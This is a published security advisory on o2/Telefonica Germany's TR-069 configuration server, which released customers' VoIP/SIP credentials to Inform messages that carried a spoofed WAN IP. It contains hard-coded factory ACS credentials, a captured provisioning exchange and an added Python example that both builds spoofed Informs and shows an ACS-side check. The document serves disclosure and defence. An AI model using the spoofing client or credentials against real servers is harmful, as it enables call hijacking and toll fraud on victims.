# Advisory: o2/Telefonica Germany: ACS Discloses VoIP/SIP Credentials

The o2 Auto Configuration Server (ACS) discloses the VoIP/SIP credentials of arbitrary customers when it receives manipulated CWMP messages. An attacker can use these credentials to register any VoIP number of the victim and thereby place and receive calls on behalf of the attacked user.

### Details

- Product: o2 DSL Auto Configuration Server
- Vulnerability Type: Information Disclosure
- Security Risk: high
- Vendor URL: `https://o2online.de/`
- Vendor Status: fixed
- Advisory URL: `https://www.redteam-pentesting.de/advisories/rt-sa-2015-005`
- Advisory Status: published
- CVE: not assigned

### Introduction

TR-069 (Technical Report 069) is a Broadband Forum technical specification entitled "CPE WAN Management Protocol" (CWMP). It defines an application layer protocol for remote management of end-user devices. (from Wikipedia)

A more technical introduction to TR-069 can be found in a deck of slides that the Interoperability Laboratory at the University of New Hampshire has published on the topic.

### More Details

The German Internet Service Provider o2 uses the TR-069 protocol to provision Customer Premises Equipment (CPE). Among other settings, VoIP/SIP credentials are transferred and VoIP telephony is set up.

In our setup, an AVM FRITZ!Box 7490 was monitored during the initial autoconfiguration process. During that process, several CWMP messages are exchanged. These CWMP messages are transferred via HTTPS as SOAP requests and replies. The HTTPS connection is always established by the CPE, which connects to the Auto Configuration Server (ACS).
According to the CWMP specification, the CPE may do so on the occasion of several events, including, but not limited to:

- BOOTSTRAP: first contact between CPE and ACS
- BOOT: the CPE has rebooted
- PERIODIC: a period of time, defined by the ACS, has elapsed
- CONNECTION REQUEST: the ACS has signalled a connection request to the CPE via a second HTTP channel

The "CONNECTION REQUEST" is the only event that can be triggered by the ACS. To do so, the ACS establishes an unencrypted HTTP connection to the CPE and authenticates via HTTP basic access authentication with a "ConnectionRequestUsername" and a "ConnectionRequestPassword". No further data is exchanged on that channel. Once the CPE has verified the credentials, it initiates the real CWMP conversation by sending a CWMP Inform message to the pre-defined ACS. The connection initiated by the CPE is TLS-secured, and the CPE provides a username (ManagementServer.Username) and a password (ManagementServer.Password) to authenticate itself towards the ACS.

A typical CWMP conversation (including the "CONNECTION REQUEST" event) is depicted below:

```
      .--------------Connection Request (HTTP)--------------.
      |                                                     |
      v                                                     |
.-----------.                                           .---------.
|   HTTP    |                                           |         |
|           |                                           |         |
|           |  ---Inform----------------------------->  |         |
|           |  <--InformResponse----------------------  |         |
|           |                                           |         |
|    CPE    |  ---[empty]---------------------------->  |   ACS   |
|           |  <--SetParameterValues------------------  |   443   |
|           |                                           | (HTTPS) |
|           |  ---SetParameterValuesResponse--------->  |         |
|           |  <--SetParameterValues------------------  |         |
|           |  [...]                                    |         |
|           |  ---SetParameterValuesResponse--------->  |         |
|           |  <--[empty]-----------------------------  |         |
'-----------'                                           '---------'
```

During our research, it was observed that the ACS URL as well as the credentials for the initial connection to the ACS are hard-coded.
On a stock AVM FRITZ!Box running firmware version 6.20, these can be found in the file ./providers/otwored/tr069.cfg, which is part of the archive /etc/default.Fritz_Box_HW185/avm/providers-049.tar. For o2/Telefonica these credentials are:

```
tr069cfg {
        enabled = yes;
        igd {
                DeviceInfo {
                        ProvisioningCode = "";
                }
                managementserver {
                        url = "https://acs.o2online.de/nbbs/tr69";
                        username = "00040E-000000000000";
                        password = "o2acs";
                        URLAlreadyContacted = no;
                        PeriodicInformEnable = yes;
                        PeriodicInformInterval = 3600;
                }
        }
        FirmwareDownload {
                enabled = yes;
                enabled_converted = yes;
        }
        ACS_SSL {
                verify_server = yes;
                trusted_ca_file = "/etc/default/avm/root_ca.pem";
        }
        Download_SSL {
                verify_server = yes;
                trusted_ca_file = "/etc/default/avm/root_ca.pem";
        }
}
```

Because these values ship inside the firmware archive, every o2-provisioned FRITZ!Box presents the same username and password to the initial ACS; they identify the device model, not a customer.

To ease the interaction with the ACS, a minimal TR-069 client was implemented. With this rogue client it was possible to simulate the behaviour of an AVM FRITZ!Box 7490 during the initial autoconfiguration process. Thus, in the following description, the word "CPE" may equally be read as "rogue client".

After the CPE connects to the ACS (see [msg00] in section Proof of Concept), it gets configured to accept new credentials for incoming connection requests:

- InternetGatewayDevice.ManagementServer.ConnectionRequestUsername
- InternetGatewayDevice.ManagementServer.ConnectionRequestPassword

(see [msg03]) The CPE is now capable of receiving connection requests from the ACS. After several seconds, the ACS initiates a connection request and the CPE starts a CWMP conversation (see [msg06]).
During that conversation, the ACS (ACS A) provides a new ACS URL (ACS B) together with a new set of login credentials for ACS B:

- InternetGatewayDevice.ManagementServer.URL
- InternetGatewayDevice.ManagementServer.Username
- InternetGatewayDevice.ManagementServer.Password
- InternetGatewayDevice.ManagementServer.ConnectionRequestUsername
- InternetGatewayDevice.ManagementServer.ConnectionRequestPassword

(see [msg09]) Finally, the CPE is rebooted. From that point in time, all CWMP conversation is directed to ACS B.

On the occasion of the "BOOT" event, the CPE connects to ACS B (see [msg12]) and receives the following settings:

- InternetGatewayDevice.ManagementServer.PeriodicInformEnable
- InternetGatewayDevice.ManagementServer.PeriodicInformInterval
- InternetGatewayDevice.ManagementServer.PeriodicInformTime

(see [msg15]) After several seconds, the CPE again receives a connection request. It connects to ACS B once more (see [msg18]) and receives the VoIP credentials for all telephone numbers that are assigned to the customer:

- InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.Line.1.DirectoryNumber
- InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.Line.1.SIP.AuthUserName
- InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.Line.1.SIP.AuthPassword
- InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.SIP.RegistrarServer
- InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.SIP.OutboundProxy

(see [msg23]) The first digits of the AuthPassword are taken from the phone number: in [msg23] it starts with the area code followed by the DirectoryNumber.

In summary, the CPE has received VoIP credentials although the only credentials it ever supplied by itself were the hard-coded ones for ACS A; the per-device credentials for ACS B (see [msg09]) were handed out by ACS A within that same, generically authenticated session. The ACS must therefore identify the customer by something other than these credentials, and the only customer-specific datum in the exchange is the WAN IP address. It was further determined that the ACS relies on the WAN/IPv4 address that the CPE itself reports in the parameter

- InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1.ExternalIPAddress

of its CWMP Inform messages (see [msg00,06,12,18]), not on the source address of the TLS connection. Since the Inform message is generated by the CPE, an attacker can manipulate it to contain an arbitrary WAN IP address. If an attacker sends such spoofed Inform messages during the whole two-step auto-provisioning process, the ACS returns the VoIP credentials that are assigned to the IP address specified by the attacker.

Additionally, any VoIP number issued by o2 may be registered from any o2 DSL account. Even if the number is already registered by the legitimate customer's CPE, an attacker may register it a second time. Incoming calls will then be directed to both clients and may be answered by either of them. This allows an attacker to place and receive phone calls on behalf of any other customer; in consequence, the victim is charged with any costs resulting from the abuse.

### Proof of Concept

As a proof of concept, the CWMP conversation that was captured during the autoprovisioning of an AVM FRITZ!Box 7490 (firmware 6.20) is given below. Each message is the body of an HTTPS POST request (to the ACS) or of the corresponding HTTPS reply (from the ACS). The SOAP envelopes are shown reduced to their CWMP content (message ID, method, parameter names and values); some messages have been wrapped to obtain better readability.
Communication with ACS A:

```
[msg00] CPE -> ACS A: Inform
---------------------
ID            100
DeviceId      Manufacturer=AVM  OUI=00040E  ProductClass=FRITZ!Box  SerialNumber=0896D776FAA2
Event         1 BOOT, 0 BOOTSTRAP
MaxEnvelopes  1
CurrentTime   2014-09-08T18:27:32+02:00
RetryCount    0
ParameterList
  InternetGatewayDevice.DeviceSummary =
      InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1, ADSLWAN:1,
      ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2, DeviceAssociation:1),
      VoiceService:1.0[2](SIPEndpoint:1, Endpoint:1, TAEndpoint:1),
      StorageService:1.0[1](Baseline:1, FTPServer:1, NetServer:1,
      HTTPServer:1, UserAccess:1, VolumeConfig:1)
  InternetGatewayDevice.DeviceInfo.HardwareVersion = FRITZ!Box 7490
  InternetGatewayDevice.DeviceInfo.SoftwareVersion = 113.06.20
  InternetGatewayDevice.DeviceInfo.SpecVersion = 1.0
  InternetGatewayDevice.DeviceInfo.ProvisioningCode = (empty)
  InternetGatewayDevice.ManagementServer.ParameterKey = (empty)
  InternetGatewayDevice.ManagementServer.ConnectionRequestURL = http://78.48.x.x:8089/869f7018
  InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.
      WANIPConnection.1.ExternalIPAddress = 78.48.x.x

[msg01] CPE <- ACS A: InformResponse
---------------------
ID            100
MaxEnvelopes  1

[msg02] CPE -> ACS A:
---------------------
[empty]

[msg03] CPE <- ACS A: SetParameterValues
---------------------
ID            null0
ParameterList
  InternetGatewayDevice.ManagementServer.PeriodicInformEnable = 1
  InternetGatewayDevice.ManagementServer.ConnectionRequestUsername = 0896D776FAA2
  InternetGatewayDevice.ManagementServer.ConnectionRequestPassword = 57d29f69eca7b5ca484e4644bf9720
  InternetGatewayDevice.ManagementServer.PeriodicInformInterval = 200
ParameterKey  null

[msg04] CPE -> ACS A: SetParameterValuesResponse
---------------------
ID            null0
Status        0

[msg05] CPE <- ACS A:
---------------------
[empty]

[msg06] CPE -> ACS A: Inform
---------------------
ID            null0
DeviceId      Manufacturer=AVM  OUI=00040E  ProductClass=FRITZ!Box  SerialNumber=0896D776FAA2
Event         6 CONNECTION REQUEST
MaxEnvelopes  1
CurrentTime   2014-09-08T18:27:34+02:00
RetryCount    0
ParameterList
  InternetGatewayDevice.DeviceSummary = (as in [msg00])
  InternetGatewayDevice.DeviceInfo.HardwareVersion = FRITZ!Box 7490
  InternetGatewayDevice.DeviceInfo.SoftwareVersion = 113.06.20
  InternetGatewayDevice.DeviceInfo.SpecVersion = 1.0
  InternetGatewayDevice.DeviceInfo.ProvisioningCode = (empty)
  InternetGatewayDevice.ManagementServer.ParameterKey = null
  InternetGatewayDevice.ManagementServer.ConnectionRequestURL = http://78.48.x.x:8089/869f7018
  InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.
      WANIPConnection.1.ExternalIPAddress = 78.48.x.x

[msg07] CPE <- ACS A: InformResponse
---------------------
ID            null0
MaxEnvelopes  1

[msg08] CPE -> ACS A:
---------------------
[empty]

[msg09] CPE <- ACS A: SetParameterValues
---------------------
ID            393158460
ParameterList
  InternetGatewayDevice.ManagementServer.URL = https://hdm.o2online.de:443/cwmpWeb/CPEMgt
  InternetGatewayDevice.ManagementServer.Username = 0896D776FAA2
  InternetGatewayDevice.ManagementServer.Password = 1410193655111a
  InternetGatewayDevice.ManagementServer.ConnectionRequestUsername = 0896D776FAA2
  InternetGatewayDevice.ManagementServer.ConnectionRequestPassword = 1410193655111a
ParameterKey  39315846

[msg10] CPE -> ACS A: SetParameterValuesResponse
---------------------
ID            393158460
Status        0

[msg11] CPE <- ACS A:
---------------------
initializeSession:null
```

Communication with ACS B:

```
[msg12] CPE -> ACS B: Inform
---------------------
ID            393158460
DeviceId      Manufacturer=AVM  OUI=00040E  ProductClass=FRITZ!Box  SerialNumber=0896D776FAA2
Event         1 BOOT, 0 BOOTSTRAP
MaxEnvelopes  1
CurrentTime   2014-09-08T18:27:35+02:00
RetryCount    0
ParameterList
  InternetGatewayDevice.DeviceSummary = (as in [msg00])
  InternetGatewayDevice.DeviceInfo.HardwareVersion = FRITZ!Box 7490
  InternetGatewayDevice.DeviceInfo.SoftwareVersion = 113.06.20
  InternetGatewayDevice.DeviceInfo.SpecVersion = 1.0
  InternetGatewayDevice.DeviceInfo.ProvisioningCode = (empty)
  InternetGatewayDevice.ManagementServer.ParameterKey = 39315846
  InternetGatewayDevice.ManagementServer.ConnectionRequestURL = http://78.48.x.x:8089/869f7018
  InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.
      WANIPConnection.1.ExternalIPAddress = 78.48.x.x

[msg13] CPE <- ACS B: InformResponse
---------------------
ID            393158460
MaxEnvelopes  1

[msg14] CPE -> ACS B:
---------------------
[empty]

[msg15] CPE <- ACS B: SetParameterValues
---------------------
ID            393158490
ParameterList
  InternetGatewayDevice.ManagementServer.PeriodicInformEnable = 1
  InternetGatewayDevice.ManagementServer.PeriodicInformInterval = 38888
  InternetGatewayDevice.ManagementServer.PeriodicInformTime = 2014-09-08T10:49:21+1:00
ParameterKey  39315849

[msg16] CPE -> ACS B: SetParameterValuesResponse
---------------------
ID            393158490
Status        0

[msg17] CPE <- ACS B:
---------------------
[empty]

[msg18] CPE -> ACS B: Inform
---------------------
ID            393158490
DeviceId      Manufacturer=AVM  OUI=00040E  ProductClass=FRITZ!Box  SerialNumber=0896D776FAA2
Event         6 CONNECTION REQUEST
MaxEnvelopes  1
CurrentTime   2014-09-08T18:27:36+02:00
RetryCount    0
ParameterList
  InternetGatewayDevice.DeviceSummary = (as in [msg00])
  InternetGatewayDevice.DeviceInfo.HardwareVersion = FRITZ!Box 7490
  InternetGatewayDevice.DeviceInfo.SoftwareVersion = 113.06.20
  InternetGatewayDevice.DeviceInfo.SpecVersion = 1.0
  InternetGatewayDevice.DeviceInfo.ProvisioningCode = (empty)
  InternetGatewayDevice.ManagementServer.ParameterKey = 39315849
  InternetGatewayDevice.ManagementServer.ConnectionRequestURL = http://78.48.x.x:8089/869f7018
  InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.
      WANIPConnection.1.ExternalIPAddress = 78.48.x.x

[msg19] CPE <- ACS B: InformResponse
---------------------
ID            393158490
MaxEnvelopes  1

[msg20] CPE -> ACS B:
---------------------
[empty]

[msg21] CPE <- ACS B: SetParameterValues
---------------------
ID            393158500
ParameterList
  InternetGatewayDevice.DeviceInfo.ProvisioningCode = 20140908xxxxxx-0896D776FAA2-78.48.x.x
  InternetGatewayDevice.Services.VoiceService.1.Capabilities.X_AVM-DE_UsePSTN = 0
ParameterKey  39315850

[msg22] CPE -> ACS B: SetParameterValuesResponse
---------------------
ID            393158500
Status        0

[msg23] CPE <- ACS B: SetParameterValues
---------------------
ID            393158501
ParameterList
  InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.Enable = Enabled
  InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.Line.1.Enable = Enabled
  InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.Line.1.SIP.X_AVM-DE_UseAuthUsername = 0
  InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.Line.1.SIP.X_AVM-DE_CLIRType = 5
  InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.PSTNFailOver = 0
  InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.DTMFMethod = RFC2833
  InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.SIP.OutboundProxy = sip.alice-voip.de
  InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.SIP.UserAgentDomain = sip.alice-voip.de
  InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.SIP.RegistrarServer = sip.alice-voip.de
  InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.SIP.ProxyServer = sip.alice-voip.de
  InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.Line.1.SIP.AuthPassword = 0241463xxxxxxxxx
  InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.Line.1.DirectoryNumber = 463xxxxx
  InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.Line.1.SIP.AuthUserName = 49241463xxxxx
ParameterKey  39315850

[msg24] CPE -> ACS B: SetParameterValuesResponse
---------------------
ID            393158501
Status        0

[msg25] CPE <- ACS B:
---------------------
[empty]
```

### Workaround

o2 implemented countermeasures that prevent attackers from spoofing a victim's IP address in CWMP messages. This prevents attackers from retrieving arbitrary o2 customers' VoIP credentials.

### Fix

The CPE needs to be properly authenticated when communicating with the ACS, instead of being identified by an IP address it reports itself. One option would be to have the CPE authenticate with the password of the DSL connection. This password is already known to the CPE, as it has been entered manually by the customer during the initial setup process, and, unlike the ACS credentials hard-coded in the firmware, it is specific to the customer.

### Security Risk

This vulnerability allows the unauthorised usage of other customers' VoIP telephone numbers. The victim will be charged with all costs resulting from fraudulent phone calls. Furthermore, an attacker may answer phone calls on behalf of the victim. Customers have no means of defending themselves against such an attack. Chances are that the attack will only be noticed by customers who regularly check their invoice. The vulnerability is therefore considered to pose a high risk.
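The two mechanisms discussed above, the self-reported ExternalIPAddress in the Inform (section More Details) and the CPE authentication proposed in the Fix section, are shown together in the following Python example. It is an added illustration and not code from the advisory, from o2 or from AVM: it builds a CWMP Inform the way a rogue TR-069 client would, pulls the SIP account out of an ACS SetParameterValues body, and implements an ACS-side authorisation check. The SOAP layout follows the CWMP 1.0 schema; the subscriber table, the sample IP addresses and the values in `SAMPLE_SPV` are constructed, and the way the ACS validates the CPE here (per-customer DSL login plus comparison of the claimed address with the connection's peer address) is this example's assumption, since the advisory does not describe how o2's countermeasure works.

```python
"""Added example, not the advisory's client nor o2's/AVM's code.
Rogue-client side: build_inform(), extract_sip_credentials().
ACS side: authorise_provisioning(). All sample data is constructed."""
import hmac
import xml.etree.ElementTree as ET

SOAP = "http://schemas.xmlsoap.org/soap/envelope/"
CWMP = "urn:dslforum-org:cwmp-1-0"
IGD = "InternetGatewayDevice."
EXT_IP = IGD + "WANDevice.1.WANConnectionDevice.1.WANIPConnection.1.ExternalIPAddress"
PROFILE = IGD + "Services.VoiceService.1.VoiceProfile.1."
LINE = PROFILE + "Line.1."

# Factory credentials from tr069.cfg, shared by every o2-branded FRITZ!Box.
FACTORY_CREDENTIALS = {("00040E-000000000000", "o2acs")}
# Constructed subscriber table: DSL login -> DSL password (the per-customer
# secret the advisory proposes for authenticating the CPE). Assumption.
SUBSCRIBERS = {"dsl-user-a": "s3cret-a"}


def build_inform(cwmp_id, serial, events, claimed_wan_ip, current_time):
    """Return a CWMP Inform envelope (bytes). claimed_wan_ip is whatever the
    client wants the ACS to believe: nothing in CWMP ties it to the TCP
    source address of the HTTPS connection carrying the message."""
    ET.register_namespace("soap", SOAP)
    ET.register_namespace("cwmp", CWMP)
    env = ET.Element(f"{{{SOAP}}}Envelope")
    hdr = ET.SubElement(env, f"{{{SOAP}}}Header")
    ET.SubElement(hdr, f"{{{CWMP}}}ID", {f"{{{SOAP}}}mustUnderstand": "1"}).text = cwmp_id
    inform = ET.SubElement(ET.SubElement(env, f"{{{SOAP}}}Body"), f"{{{CWMP}}}Inform")
    dev = ET.SubElement(inform, "DeviceId")
    for tag, val in (("Manufacturer", "AVM"), ("OUI", "00040E"),
                     ("ProductClass", "FRITZ!Box"), ("SerialNumber", serial)):
        ET.SubElement(dev, tag).text = val
    ev = ET.SubElement(inform, "Event")
    for code in events:                       # e.g. "1 BOOT", "0 BOOTSTRAP"
        es = ET.SubElement(ev, "EventStruct")
        ET.SubElement(es, "EventCode").text = code
        ET.SubElement(es, "CommandKey").text = ""
    ET.SubElement(inform, "MaxEnvelopes").text = "1"
    ET.SubElement(inform, "CurrentTime").text = current_time
    ET.SubElement(inform, "RetryCount").text = "0"
    plist = ET.SubElement(inform, "ParameterList")
    for name, val in ((IGD + "DeviceInfo.HardwareVersion", "FRITZ!Box 7490"),
                      (IGD + "DeviceInfo.SoftwareVersion", "113.06.20"),
                      (IGD + "ManagementServer.ConnectionRequestURL",
                       f"http://{claimed_wan_ip}:8089/869f7018"),
                      (EXT_IP, claimed_wan_ip)):
        pvs = ET.SubElement(plist, "ParameterValueStruct")
        ET.SubElement(pvs, "Name").text = name
        ET.SubElement(pvs, "Value").text = val
    return ET.tostring(env, encoding="utf-8", xml_declaration=True)


def parameter_values(xml_bytes):
    """{Name: Value} for every ParameterValueStruct in a CWMP message."""
    return {p.findtext("Name"): p.findtext("Value") or ""
            for p in ET.fromstring(xml_bytes).iter("ParameterValueStruct")}


def extract_sip_credentials(set_parameter_values_xml):
    """The SIP account from an ACS SetParameterValues, or None if absent."""
    params = parameter_values(set_parameter_values_xml)
    if LINE + "SIP.AuthPassword" not in params:
        return None
    return {"number": params.get(LINE + "DirectoryNumber"),
            "user": params.get(LINE + "SIP.AuthUserName"),
            "password": params[LINE + "SIP.AuthPassword"],
            "registrar": params.get(PROFILE + "SIP.RegistrarServer")}


def authorise_provisioning(inform_xml, peer_ip, username, password):
    """ACS side: (ok, reason). Subscriber-specific data such as SIP
    credentials may only be sent when ok is True. peer_ip is taken from the
    accepted socket, never from the message body (assumed check)."""
    if (username, password) in FACTORY_CREDENTIALS:
        return False, "factory credentials only identify the device model"
    expected = SUBSCRIBERS.get(username)
    if expected is None or not hmac.compare_digest(expected, password):
        return False, "unknown subscriber or wrong password"
    claimed = parameter_values(inform_xml).get(EXT_IP)
    if claimed != peer_ip:
        return False, f"Inform claims {claimed} but connection came from {peer_ip}"
    return True, "ok"


# Constructed SetParameterValues body shaped like [msg23]; values are fake.
SAMPLE_SPV = f"""<soap:Envelope xmlns:soap="{SOAP}" xmlns:cwmp="{CWMP}">
<soap:Header><cwmp:ID soap:mustUnderstand="1">393158501</cwmp:ID></soap:Header>
<soap:Body><cwmp:SetParameterValues><ParameterList>
<ParameterValueStruct><Name>{PROFILE}SIP.RegistrarServer</Name><Value>sip.alice-voip.de</Value></ParameterValueStruct>
<ParameterValueStruct><Name>{LINE}SIP.AuthPassword</Name><Value>0241463000000</Value></ParameterValueStruct>
<ParameterValueStruct><Name>{LINE}DirectoryNumber</Name><Value>4630000</Value></ParameterValueStruct>
<ParameterValueStruct><Name>{LINE}SIP.AuthUserName</Name><Value>492414630000</Value></ParameterValueStruct>
</ParameterList><ParameterKey>39315850</ParameterKey>
</cwmp:SetParameterValues></soap:Body></soap:Envelope>""".encode()


if __name__ == "__main__":
    spoofed = build_inform("100", "0896D776FAA2", ["1 BOOT", "0 BOOTSTRAP"],
                           "203.0.113.7", "2014-09-08T18:27:32+02:00")
    print(extract_sip_credentials(SAMPLE_SPV))
    # Connection really originates from 198.51.100.10; Inform claims 203.0.113.7.
    print(authorise_provisioning(spoofed, "198.51.100.10", "00040E-000000000000", "o2acs"))
    print(authorise_provisioning(spoofed, "198.51.100.10", "dsl-user-a", "s3cret-a"))
```

Run directly, the script prints the extracted SIP account and two refusals: the first because the factory credentials say nothing about which customer is connecting, the second because the address claimed inside the Inform does not match the address the connection actually came from. The design point is that the ACS must never derive customer identity from a value the CPE chooses; the body of the Inform is attacker-controlled, the socket's peer address and a per-customer secret are not.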
### Timeline

- 2014-09-08 - Potential vulnerability discovered
- 2014-09-20 - Vulnerability verified
- 2014-10-17 - ISP was notified about the vulnerability
- 2014-10-17 - ISP implemented first countermeasures
- 2014-10-24 - ISP wants to investigate further
- 2014-11-28 - ISP needs more time, depends on hardware manufacturer
- 2015-01-23 - ISP is still investigating, wants to solve the problem permanently
- 2015-03-31 - ISP is still working on the problem, asks for more time
- 2015-06-12 - ISP wants to notify the relevant German authorities about the problem first while working on a solution
- 2015-06-18 - ISP notified German authorities (Bundesnetzagentur, BfDI, BSI)
- 2016-01-08 - Advisory released

### RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at: